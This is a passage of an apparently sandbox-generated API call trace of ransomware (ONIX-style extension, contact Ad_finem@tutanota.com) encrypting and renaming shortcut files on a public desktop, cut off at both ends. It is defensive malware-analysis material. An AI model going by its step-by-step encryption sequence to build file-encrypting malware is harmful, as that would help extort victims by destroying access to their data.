lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0122.500] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.500] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.500] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.500] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.500] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk", dwFileAttributes=0x80) returned 1 [0122.500] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 43 [0122.500] GetProcessHeap () returned 0x410000 [0122.500] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc6) returned 0x4dcb80 [0122.500] lstrcpyW (in: lpString1=0x4dcb80, lpString2="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk" [0122.500] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.500] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2025) returned 1 [0122.500] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x7e9 [0122.500] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.500] GetProcessHeap () returned 0x410000 [0122.500] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.501] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.501] WriteFile (in: hFile=0x4e4, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.504] WriteFile (in: hFile=0x4e4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.505] WriteFile (in: hFile=0x4e4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.506] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7e9) returned 0x4e0b68 [0122.506] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7e9) returned 0x4e1360 [0122.506] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.506] ReadFile (in: hFile=0x4e4, lpBuffer=0x4e0b68, nNumberOfBytesToRead=0x7e9, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e0b68*, lpNumberOfBytesRead=0x367f44c*=0x7e9, lpOverlapped=0x0) returned 1 [0122.507] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=-2025, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.507] WriteFile (in: hFile=0x4e4, lpBuffer=0x4e1360*, nNumberOfBytesToWrite=0x7e9, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1360*, lpNumberOfBytesWritten=0x367f44c*=0x7e9, lpOverlapped=0x0) returned 1 [0122.508] UnlockFile (hFile=0x4e4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7e9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.508] CloseHandle (hObject=0x4e4) returned 1 [0122.509] GetProcessHeap () returned 0x410000 [0122.509] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.509] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.511] GetProcessHeap () returned 0x410000 [0122.511] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dcb80 | out: hHeap=0x410000) returned 1 [0122.511] FindNextFileW (in: hFindFile=0x48f1b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.511] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4e4 [0122.511] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.511] LockFile (hFile=0x4e4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xae, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.511] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.512] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.512] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.512] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.512] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini", dwFileAttributes=0x80) returned 1 [0122.512] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\desktop.ini") returned 36 [0122.512] GetProcessHeap () returned 0x410000 [0122.512] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb8) returned 0x46e9d8 [0122.512] lstrcpyW (in: lpString1=0x46e9d8, lpString2="C:\\\\Users\\Public\\Desktop\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Desktop\\desktop.ini") returned="C:\\\\Users\\Public\\Desktop\\desktop.ini" [0122.512] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.512] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=174) returned 1 [0122.512] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xae [0122.512] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.512] GetProcessHeap () returned 0x410000 [0122.512] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.512] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.512] WriteFile (in: hFile=0x4e4, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.514] WriteFile (in: hFile=0x4e4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.515] WriteFile (in: hFile=0x4e4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xae) returned 0x4b33e0 [0122.517] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xae) returned 0x4b3498 [0122.517] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.517] ReadFile (in: hFile=0x4e4, lpBuffer=0x4b33e0, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b33e0*, lpNumberOfBytesRead=0x367f44c*=0xae, lpOverlapped=0x0) returned 1 [0122.517] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.517] WriteFile (in: hFile=0x4e4, lpBuffer=0x4b3498*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b3498*, lpNumberOfBytesWritten=0x367f44c*=0xae, lpOverlapped=0x0) returned 1 [0122.518] UnlockFile (hFile=0x4e4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xae, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.518] CloseHandle (hObject=0x4e4) returned 1 [0122.519] GetProcessHeap () returned 0x410000 [0122.519] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.520] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\desktop\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.521] GetProcessHeap () returned 0x410000 [0122.521] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46e9d8 | out: hHeap=0x410000) returned 1 [0122.522] FindNextFileW (in: hFindFile=0x48f1b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0122.522] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4e4 [0122.522] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.522] LockFile (hFile=0x4e4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x8d1, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.522] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.522] ReadFile (in: hFile=0x4e4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0122.523] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.523] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.523] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.523] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.523] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk", dwFileAttributes=0x80) returned 1 [0122.523] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 42 [0122.523] GetProcessHeap () returned 0x410000 [0122.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc4) returned 0x4dcb80 [0122.523] lstrcpyW (in: lpString1=0x4dcb80, lpString2="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk" [0122.523] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.523] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2257) returned 1 [0122.523] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x8d1 [0122.524] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.524] GetProcessHeap () returned 0x410000 [0122.524] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.524] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.524] WriteFile (in: hFile=0x4e4, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.525] WriteFile (in: hFile=0x4e4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.526] WriteFile (in: hFile=0x4e4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.527] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8d1) returned 0x4e0b68 [0122.527] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8d1) returned 0x4e1448 [0122.527] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.527] ReadFile (in: hFile=0x4e4, lpBuffer=0x4e0b68, nNumberOfBytesToRead=0x8d1, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e0b68*, lpNumberOfBytesRead=0x367f44c*=0x8d1, lpOverlapped=0x0) returned 1 [0122.527] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=-2257, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.527] WriteFile (in: hFile=0x4e4, lpBuffer=0x4e1448*, nNumberOfBytesToWrite=0x8d1, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1448*, lpNumberOfBytesWritten=0x367f44c*=0x8d1, lpOverlapped=0x0) returned 1 [0122.528] UnlockFile (hFile=0x4e4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x8d1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.528] CloseHandle (hObject=0x4e4) returned 1 [0122.529] GetProcessHeap () returned 0x410000 [0122.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.529] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\Google Chrome.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.531] GetProcessHeap () returned 0x410000 [0122.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dcb80 | out: hHeap=0x410000) returned 1 [0122.532] FindNextFileW (in: hFindFile=0x48f1b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0122.532] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4e4 [0122.532] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.532] LockFile (hFile=0x4e4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x485, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.532] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.532] ReadFile (in: hFile=0x4e4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0122.533] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.533] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.533] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.533] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.533] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", dwFileAttributes=0x80) returned 1 [0122.533] lstrlenW (lpString="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 44 [0122.533] GetProcessHeap () returned 0x410000 [0122.533] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc8) returned 0x4dcb80 [0122.533] lstrcpyW (in: lpString1=0x4dcb80, lpString2="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0122.533] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.533] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1157) returned 1 [0122.533] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x485 [0122.534] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.534] GetProcessHeap () returned 0x410000 [0122.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.534] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.534] WriteFile (in: hFile=0x4e4, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.536] WriteFile (in: hFile=0x4e4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.536] WriteFile (in: hFile=0x4e4, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x485) returned 0x4e0b68 [0122.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x485) returned 0x4e0ff8 [0122.538] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.538] ReadFile (in: hFile=0x4e4, lpBuffer=0x4e0b68, nNumberOfBytesToRead=0x485, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e0b68*, lpNumberOfBytesRead=0x367f44c*=0x485, lpOverlapped=0x0) returned 1 [0122.538] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=-1157, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.538] WriteFile (in: hFile=0x4e4, lpBuffer=0x4e0ff8*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e0ff8*, lpNumberOfBytesWritten=0x367f44c*=0x485, lpOverlapped=0x0) returned 1 [0122.539] UnlockFile (hFile=0x4e4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x485, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.539] CloseHandle (hObject=0x4e4) returned 1 [0122.540] GetProcessHeap () returned 0x410000 [0122.540] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.540] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), lpNewFileName="C:\\\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.542] GetProcessHeap () returned 0x410000 [0122.542] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dcb80 | out: hHeap=0x410000) returned 1 [0122.542] FindNextFileW (in: hFindFile=0x48f1b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f8cf0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3296b110, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.542] FindNextFileW (in: hFindFile=0x48f1b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f8cf0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3296b110, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, 